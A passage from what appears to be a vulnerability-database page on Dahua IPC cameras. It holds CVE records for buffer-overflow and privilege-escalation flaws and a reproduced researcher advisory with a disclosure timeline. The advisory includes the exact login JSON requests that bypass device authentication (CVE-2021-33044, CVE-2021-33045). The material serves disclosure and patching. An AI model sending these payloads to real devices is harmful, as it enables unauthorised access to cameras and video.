Search criteria
8 vulnerabilities found for IPC by Dahua
CVE-2025-31702 (GCVE-0-2025-31702)
Vulnerability from cvelistv5 – Published: 2025-10-15 05:53 – Updated: 2025-10-15 13:25
VLAI?
Summary
A vulnerability exists in certain Dahua embedded products. Third-party malicious attacker with obtained normal user credentials could exploit the vulnerability to access certain data which are restricted to admin privileges, such as system-sensitive files through specific HTTP request. This may cause tampering with admin password, leading to privilege escalation. Systems with only admin account are not affected.
Severity ?
6.8 (Medium)
CWE
- CWE-732 - Incorrect Permission Assignment for Critical Resource
Assigner
References
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-31702",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-10-15T13:24:13.780409Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-10-15T13:25:09.791Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "IPC",
"vendor": "Dahua",
"versions": [
{
"status": "affected",
"version": "Affected products include certain models from the IPC-1XXX, IPC-2XXX, IPC-WX, and IPC-ECXX series, and limited to versions which build time prior to 1st July 2025 (not including 1st July 2025)."
}
]
},
{
"defaultStatus": "unaffected",
"product": "SD",
"vendor": "Dahua",
"versions": [
{
"status": "affected",
"version": "Affected products include certain models from the SD3A, SD2A, SD3D, SDT2A, and SD2C series, and limited to versions which build time prior to 1st July 2025 (not including 1st July 2025)."
}
]
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eA vulnerability exists in certain Dahua embedded products. Third-party malicious attacker with obtained normal user credentials could exploit the vulnerability to access certain data which are restricted to admin privileges, such as system-sensitive files through specific HTTP request. This may cause tampering with admin password, leading to privilege escalation. Systems with only admin account are not affected.\u003c/span\u003e"
}
],
"value": "A vulnerability exists in certain Dahua embedded products. Third-party malicious attacker with obtained normal user credentials could exploit the vulnerability to access certain data which are restricted to admin privileges, such as system-sensitive files through specific HTTP request. This may cause tampering with admin password, leading to privilege escalation. Systems with only admin account are not affected."
}
],
"impacts": [
{
"capecId": "CAPEC-233",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-233 Privilege Escalation"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-732",
"description": "CWE-732 Incorrect Permission Assignment for Critical Resource",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-10-15T05:53:35.664Z",
"orgId": "79ee569e-7d1e-4364-98f0-3a18e2a739ad",
"shortName": "dahua"
},
"references": [
{
"url": "https://www.dahuasecurity.com/aboutUs/trustedCenter/details/777"
}
],
"source": {
"discovery": "UNKNOWN"
},
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "79ee569e-7d1e-4364-98f0-3a18e2a739ad",
"assignerShortName": "dahua",
"cveId": "CVE-2025-31702",
"datePublished": "2025-10-15T05:53:35.664Z",
"dateReserved": "2025-04-01T05:57:11.782Z",
"dateUpdated": "2025-10-15T13:25:09.791Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2025-31701 (GCVE-0-2025-31701)
Vulnerability from cvelistv5 – Published: 2025-07-23 06:55 – Updated: 2025-07-23 14:14
VLAI?
Summary
A vulnerability has been found in Dahua products.
Attackers could exploit a buffer overflow vulnerability by sending specially crafted malicious packets, potentially causing service disruption (e.g., crashes) or remote code execution (RCE). Some devices may have deployed protection mechanisms such as Address Space Layout Randomization (ASLR), which reduces the likelihood of successful RCE exploitation. However, denial-of-service (DoS) attacks remain a concern.
Severity ?
8.1 (High)
CWE
- CWE-120 - Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
Assigner
References
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-31701",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-07-23T14:13:36.512237Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-120",
"description": "CWE-120 Buffer Copy without Checking Size of Input (\u0027Classic Buffer Overflow\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-07-23T14:14:04.669Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "IPC",
"vendor": "Dahua",
"versions": [
{
"status": "affected",
"version": "Affected products include certain models from the IPC-1XXX, IPC-2XXX, IPC-WX, and IPC-ECXX series, and limited to versions which build time before April 16, 2025."
}
]
},
{
"defaultStatus": "unaffected",
"product": "SD",
"vendor": "Dahua",
"versions": [
{
"status": "affected",
"version": "Affected products include certain models from the SD3A, SD2A, SD3D, SDT2A, and SD2C series, and limited to versions which build time before April 16, 2025."
}
]
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "A vulnerability has been found in Dahua products.\n\nAttackers could exploit a buffer overflow vulnerability by sending specially crafted malicious packets, potentially causing service disruption (e.g., crashes) or remote code execution (RCE). Some devices may have deployed protection mechanisms such as Address Space Layout Randomization (ASLR), which reduces the likelihood of successful RCE exploitation. However, denial-of-service (DoS) attacks remain a concern."
}
],
"value": "A vulnerability has been found in Dahua products.\n\nAttackers could exploit a buffer overflow vulnerability by sending specially crafted malicious packets, potentially causing service disruption (e.g., crashes) or remote code execution (RCE). Some devices may have deployed protection mechanisms such as Address Space Layout Randomization (ASLR), which reduces the likelihood of successful RCE exploitation. However, denial-of-service (DoS) attacks remain a concern."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-07-23T06:55:20.001Z",
"orgId": "79ee569e-7d1e-4364-98f0-3a18e2a739ad",
"shortName": "dahua"
},
"references": [
{
"url": "https://www.dahuasecurity.com/aboutUs/trustedCenter/details/775"
}
],
"source": {
"discovery": "UNKNOWN"
},
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "79ee569e-7d1e-4364-98f0-3a18e2a739ad",
"assignerShortName": "dahua",
"cveId": "CVE-2025-31701",
"datePublished": "2025-07-23T06:55:20.001Z",
"dateReserved": "2025-04-01T05:57:11.782Z",
"dateUpdated": "2025-07-23T14:14:04.669Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2025-31700 (GCVE-0-2025-31700)
Vulnerability from cvelistv5 – Published: 2025-07-23 06:54 – Updated: 2025-07-23 14:19
VLAI?
Summary
A vulnerability has been found in Dahua products.
Attackers could exploit a buffer overflow vulnerability by sending specially crafted malicious packets, potentially causing service disruption (e.g., crashes) or remote code execution (RCE). Some devices may have deployed protection mechanisms such as Address Space Layout Randomization (ASLR), which reduces the likelihood of successful RCE exploitation. However, denial-of-service (DoS) attacks remain a concern.
Severity ?
8.1 (High)
CWE
- CWE-120 - Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
Assigner
References
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-31700",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-07-23T14:19:16.055106Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-120",
"description": "CWE-120 Buffer Copy without Checking Size of Input (\u0027Classic Buffer Overflow\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-07-23T14:19:19.313Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "IPC",
"vendor": "Dahua",
"versions": [
{
"status": "affected",
"version": "Affected products include certain models from the IPC-1XXX, IPC-2XXX, IPC-WX, and IPC-ECXX series, and limited to versions which build time before April 16, 2025."
}
]
},
{
"defaultStatus": "unaffected",
"product": "SD",
"vendor": "Dahua",
"versions": [
{
"status": "affected",
"version": "Affected products include certain models from the SD3A, SD2A, SD3D, SDT2A, and SD2C series, and limited to versions which build time before April 16, 2025."
}
]
}
],
"datePublic": "2025-07-23T02:00:00.000Z",
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "A vulnerability has been found in Dahua products.\n\nAttackers could exploit a buffer overflow vulnerability by sending specially crafted malicious packets, potentially causing service disruption (e.g., crashes) or remote code execution (RCE). Some devices may have deployed protection mechanisms such as Address Space Layout Randomization (ASLR), which reduces the likelihood of successful RCE exploitation. However, denial-of-service (DoS) attacks remain a concern."
}
],
"value": "A vulnerability has been found in Dahua products.\n\nAttackers could exploit a buffer overflow vulnerability by sending specially crafted malicious packets, potentially causing service disruption (e.g., crashes) or remote code execution (RCE). Some devices may have deployed protection mechanisms such as Address Space Layout Randomization (ASLR), which reduces the likelihood of successful RCE exploitation. However, denial-of-service (DoS) attacks remain a concern."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-07-23T06:54:37.996Z",
"orgId": "79ee569e-7d1e-4364-98f0-3a18e2a739ad",
"shortName": "dahua"
},
"references": [
{
"url": "https://www.dahuasecurity.com/aboutUs/trustedCenter/details/775"
}
],
"source": {
"discovery": "UNKNOWN"
},
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "79ee569e-7d1e-4364-98f0-3a18e2a739ad",
"assignerShortName": "dahua",
"cveId": "CVE-2025-31700",
"datePublished": "2025-07-23T06:54:37.996Z",
"dateReserved": "2025-04-01T05:57:11.782Z",
"dateUpdated": "2025-07-23T14:19:19.313Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2025-31702 (GCVE-0-2025-31702)
Vulnerability from nvd – Published: 2025-10-15 05:53 – Updated: 2025-10-15 13:25
VLAI?
Summary
A vulnerability exists in certain Dahua embedded products. Third-party malicious attacker with obtained normal user credentials could exploit the vulnerability to access certain data which are restricted to admin privileges, such as system-sensitive files through specific HTTP request. This may cause tampering with admin password, leading to privilege escalation. Systems with only admin account are not affected.
Severity ?
6.8 (Medium)
CWE
- CWE-732 - Incorrect Permission Assignment for Critical Resource
Assigner
References
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-31702",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-10-15T13:24:13.780409Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-10-15T13:25:09.791Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "IPC",
"vendor": "Dahua",
"versions": [
{
"status": "affected",
"version": "Affected products include certain models from the IPC-1XXX, IPC-2XXX, IPC-WX, and IPC-ECXX series, and limited to versions which build time prior to 1st July 2025 (not including 1st July 2025)."
}
]
},
{
"defaultStatus": "unaffected",
"product": "SD",
"vendor": "Dahua",
"versions": [
{
"status": "affected",
"version": "Affected products include certain models from the SD3A, SD2A, SD3D, SDT2A, and SD2C series, and limited to versions which build time prior to 1st July 2025 (not including 1st July 2025)."
}
]
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eA vulnerability exists in certain Dahua embedded products. Third-party malicious attacker with obtained normal user credentials could exploit the vulnerability to access certain data which are restricted to admin privileges, such as system-sensitive files through specific HTTP request. This may cause tampering with admin password, leading to privilege escalation. Systems with only admin account are not affected.\u003c/span\u003e"
}
],
"value": "A vulnerability exists in certain Dahua embedded products. Third-party malicious attacker with obtained normal user credentials could exploit the vulnerability to access certain data which are restricted to admin privileges, such as system-sensitive files through specific HTTP request. This may cause tampering with admin password, leading to privilege escalation. Systems with only admin account are not affected."
}
],
"impacts": [
{
"capecId": "CAPEC-233",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-233 Privilege Escalation"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-732",
"description": "CWE-732 Incorrect Permission Assignment for Critical Resource",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-10-15T05:53:35.664Z",
"orgId": "79ee569e-7d1e-4364-98f0-3a18e2a739ad",
"shortName": "dahua"
},
"references": [
{
"url": "https://www.dahuasecurity.com/aboutUs/trustedCenter/details/777"
}
],
"source": {
"discovery": "UNKNOWN"
},
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "79ee569e-7d1e-4364-98f0-3a18e2a739ad",
"assignerShortName": "dahua",
"cveId": "CVE-2025-31702",
"datePublished": "2025-10-15T05:53:35.664Z",
"dateReserved": "2025-04-01T05:57:11.782Z",
"dateUpdated": "2025-10-15T13:25:09.791Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2025-31701 (GCVE-0-2025-31701)
Vulnerability from nvd – Published: 2025-07-23 06:55 – Updated: 2025-07-23 14:14
VLAI?
Summary
A vulnerability has been found in Dahua products.
Attackers could exploit a buffer overflow vulnerability by sending specially crafted malicious packets, potentially causing service disruption (e.g., crashes) or remote code execution (RCE). Some devices may have deployed protection mechanisms such as Address Space Layout Randomization (ASLR), which reduces the likelihood of successful RCE exploitation. However, denial-of-service (DoS) attacks remain a concern.
Severity ?
8.1 (High)
CWE
- CWE-120 - Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
Assigner
References
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-31701",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-07-23T14:13:36.512237Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-120",
"description": "CWE-120 Buffer Copy without Checking Size of Input (\u0027Classic Buffer Overflow\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-07-23T14:14:04.669Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "IPC",
"vendor": "Dahua",
"versions": [
{
"status": "affected",
"version": "Affected products include certain models from the IPC-1XXX, IPC-2XXX, IPC-WX, and IPC-ECXX series, and limited to versions which build time before April 16, 2025."
}
]
},
{
"defaultStatus": "unaffected",
"product": "SD",
"vendor": "Dahua",
"versions": [
{
"status": "affected",
"version": "Affected products include certain models from the SD3A, SD2A, SD3D, SDT2A, and SD2C series, and limited to versions which build time before April 16, 2025."
}
]
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "A vulnerability has been found in Dahua products.\n\nAttackers could exploit a buffer overflow vulnerability by sending specially crafted malicious packets, potentially causing service disruption (e.g., crashes) or remote code execution (RCE). Some devices may have deployed protection mechanisms such as Address Space Layout Randomization (ASLR), which reduces the likelihood of successful RCE exploitation. However, denial-of-service (DoS) attacks remain a concern."
}
],
"value": "A vulnerability has been found in Dahua products.\n\nAttackers could exploit a buffer overflow vulnerability by sending specially crafted malicious packets, potentially causing service disruption (e.g., crashes) or remote code execution (RCE). Some devices may have deployed protection mechanisms such as Address Space Layout Randomization (ASLR), which reduces the likelihood of successful RCE exploitation. However, denial-of-service (DoS) attacks remain a concern."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-07-23T06:55:20.001Z",
"orgId": "79ee569e-7d1e-4364-98f0-3a18e2a739ad",
"shortName": "dahua"
},
"references": [
{
"url": "https://www.dahuasecurity.com/aboutUs/trustedCenter/details/775"
}
],
"source": {
"discovery": "UNKNOWN"
},
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "79ee569e-7d1e-4364-98f0-3a18e2a739ad",
"assignerShortName": "dahua",
"cveId": "CVE-2025-31701",
"datePublished": "2025-07-23T06:55:20.001Z",
"dateReserved": "2025-04-01T05:57:11.782Z",
"dateUpdated": "2025-07-23T14:14:04.669Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2025-31700 (GCVE-0-2025-31700)
Vulnerability from nvd – Published: 2025-07-23 06:54 – Updated: 2025-07-23 14:19
VLAI?
Summary
A vulnerability has been found in Dahua products.
Attackers could exploit a buffer overflow vulnerability by sending specially crafted malicious packets, potentially causing service disruption (e.g., crashes) or remote code execution (RCE). Some devices may have deployed protection mechanisms such as Address Space Layout Randomization (ASLR), which reduces the likelihood of successful RCE exploitation. However, denial-of-service (DoS) attacks remain a concern.
Severity ?
8.1 (High)
CWE
- CWE-120 - Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
Assigner
References
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-31700",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-07-23T14:19:16.055106Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-120",
"description": "CWE-120 Buffer Copy without Checking Size of Input (\u0027Classic Buffer Overflow\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-07-23T14:19:19.313Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "IPC",
"vendor": "Dahua",
"versions": [
{
"status": "affected",
"version": "Affected products include certain models from the IPC-1XXX, IPC-2XXX, IPC-WX, and IPC-ECXX series, and limited to versions which build time before April 16, 2025."
}
]
},
{
"defaultStatus": "unaffected",
"product": "SD",
"vendor": "Dahua",
"versions": [
{
"status": "affected",
"version": "Affected products include certain models from the SD3A, SD2A, SD3D, SDT2A, and SD2C series, and limited to versions which build time before April 16, 2025."
}
]
}
],
"datePublic": "2025-07-23T02:00:00.000Z",
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "A vulnerability has been found in Dahua products.\n\nAttackers could exploit a buffer overflow vulnerability by sending specially crafted malicious packets, potentially causing service disruption (e.g., crashes) or remote code execution (RCE). Some devices may have deployed protection mechanisms such as Address Space Layout Randomization (ASLR), which reduces the likelihood of successful RCE exploitation. However, denial-of-service (DoS) attacks remain a concern."
}
],
"value": "A vulnerability has been found in Dahua products.\n\nAttackers could exploit a buffer overflow vulnerability by sending specially crafted malicious packets, potentially causing service disruption (e.g., crashes) or remote code execution (RCE). Some devices may have deployed protection mechanisms such as Address Space Layout Randomization (ASLR), which reduces the likelihood of successful RCE exploitation. However, denial-of-service (DoS) attacks remain a concern."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-07-23T06:54:37.996Z",
"orgId": "79ee569e-7d1e-4364-98f0-3a18e2a739ad",
"shortName": "dahua"
},
"references": [
{
"url": "https://www.dahuasecurity.com/aboutUs/trustedCenter/details/775"
}
],
"source": {
"discovery": "UNKNOWN"
},
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "79ee569e-7d1e-4364-98f0-3a18e2a739ad",
"assignerShortName": "dahua",
"cveId": "CVE-2025-31700",
"datePublished": "2025-07-23T06:54:37.996Z",
"dateReserved": "2025-04-01T05:57:11.782Z",
"dateUpdated": "2025-07-23T14:19:19.313Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
VAR-202109-1875
Vulnerability from variot - Updated: 2024-01-19 23:24The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets. plural Dahua The product contains authentication vulnerabilities.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Dahua Technology Multiple products offered by (CWE-287) vulnerabilities exist. In this vulnerability information, DHI-ASI7213Y-V3-T1 Based on the Information Security Early Warning Partnership, the impact on IPA Report to JPCERT/CC Coordinated with the developer. Reporter : Mitsui Bussan Secure Direction Co., Ltd.A remote third party can exploit the product by sending a specially crafted data packet. ID Authentication may be bypassed. Dahua IPC is a series of industrial computer of Dahua of China Dahua Company. Zhejiang Dahua Technology Co., Ltd. is a leading monitoring product supplier and solution service provider. [STX]
Subject: [Update]: Dahua Authentication bypass (CVE-2021-33044, CVE-2021-33045)
Attack vector: Remote Authentication: Anonymous (no credentials needed) Researcher: bashis (2021) Limited Disclosure: September 6, 2021 Full Disclosure: October 6, 2021 PoC: https://github.com/mcw0/DahuaConsole
-=[Dahua]=- Advisory: https://www.dahuasecurity.com/support/cybersecurity/details/957 Firmware: https://www.dahuasecurity.com/support/downloadCenter/firmware
-=[Timeline]=- June 13, 2021: Initiated contact with Dahua PSIRT (CyberSecurity@dahuatech.com) June 17, 2021: Sent reminder to Dahua PSIRT June 18, 2021: Asked IPVM for help to get in contact with Dahua June 18, 2021: Received ACK from IPVM, told they sent note to Dahua June 19, 2021: ACK received from Dahua PSIRT, asked for additional details June 19, 2021: Additional details including PoC sent June 21, 2021: ACK received, vulnerabilites confirmed June 23, 2021: Dahua PSIRT asked for "coordinated disclosure" June 23, 2021: Confirmed 90 days before my disclosure, said they may release updated firmware anytime from now June 24, 2021: Received CVE-2021-33044, I asked about the second CVE July 03, 2021: Received CVE-2021-33045, Dahua PSIRT asked again for "coordinated disclosure" July 04, 2021: Confirmed "coordinated disclosure", once again July 05, 2021: Dahua PSIRT tried convince me for "Full Disclosure" for vendor only, and "Limited Disclosure" for outside world July 05, 2021: Disagreed, told I will let Dahua PSIRT read my note before "Limited Disclosure" September 6, 2021. "Full Disclosure" will be October 6, 2021, August 30, 2021: Dahua PSIRT asked to read my "Limited Disclosure" note August 30, 2021: Sent my "Limited Disclosure" note September 1, 2021: Dahua PSIRT informing about release of their Security Advisory and firmware updates September 1, 2021: Notified Dahua PSIRT that I cannot find firmware updates for my IPC/VTH/VTO devices September 2, 2021: Dahua PSIRT pointed oversea website, asked for what models I have so Dahua could release firmware September 2, 2021: Refused to provide details, as I do expect me to find firmware on their website September 3, 2021: Dahua PSIRT informed that R&D will upload updated firmware in batches September 6, 2021: Limited Disclosure October 6, 2021: Full Disclosure
-=[NetKeyboard Vulnerability]=-
CVE-2021-33044
Vulnerability: "clientType": "NetKeyboard", Vulnerable device types: IPC/VTH/VTO (tested) Vulnerable Firmware: Those devices who do not support "NetKeyboard" functionality (older than June 2021) Protocol: DHIP and HTTP/HTTPS
Details: Setting above "Vulnerability" on "Vulnerable device types" during 1st or 2nd "global.login" sequence will simply bypass authentication.
Successful bypass returns: {"id":1,"params":{"keepAliveInterval":60},"result":true,"session":}
[Example] { "method": "global.login", "params": { "userName": "admin", "loginType": "Direct", "clientType": "NetKeyboard", "authorityType": "Default", "passwordType": "Default", "password": "Not Used" }, "id": 1, "session": 0 }
-=[Loopback Vulnerability]=-
CVE-2021-33045
Vulnerability: "ipAddr": "127.0.0.1", "loginType": "Loopback", "clientType": "Local",
Vulnerable device types: IPC/VTH/VTO/NVR/DVR (tested) Vulnerable Firmware: Firmware version older than beginning/mid 2020. Protocol: DHIP
Details: Setting above "Vulnerability" on "Vulnerable device types" during 1st or 2nd "global.login" sequence pretends that the login request comes from "loopback" and will therefore bypass legitimate authentication.
Successful bypass returns: {"id":1,"params":{"keepAliveInterval":60},"result":true,"session":}
[Example] Random MD5 with l/p: admin/admin { "method": "global.login", "params": { "userName": "admin", "ipAddr": "127.0.0.1", "loginType": "Loopback", "clientType": "Local", "authorityType": "Default", "passwordType": "Default", "password": "[REDACTED]" }, "id": 1, "session": 0 }
Plain text with l/p: admin/admin { "method": "global.login", "params": { "userName": "admin", "ipAddr": "127.0.0.1", "loginType": "Loopback", "clientType": "Local", "authorityType": "Default", "passwordType": "Plain", "password": "admin" }, "id": 1, "session": 0 }
[ETX]
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
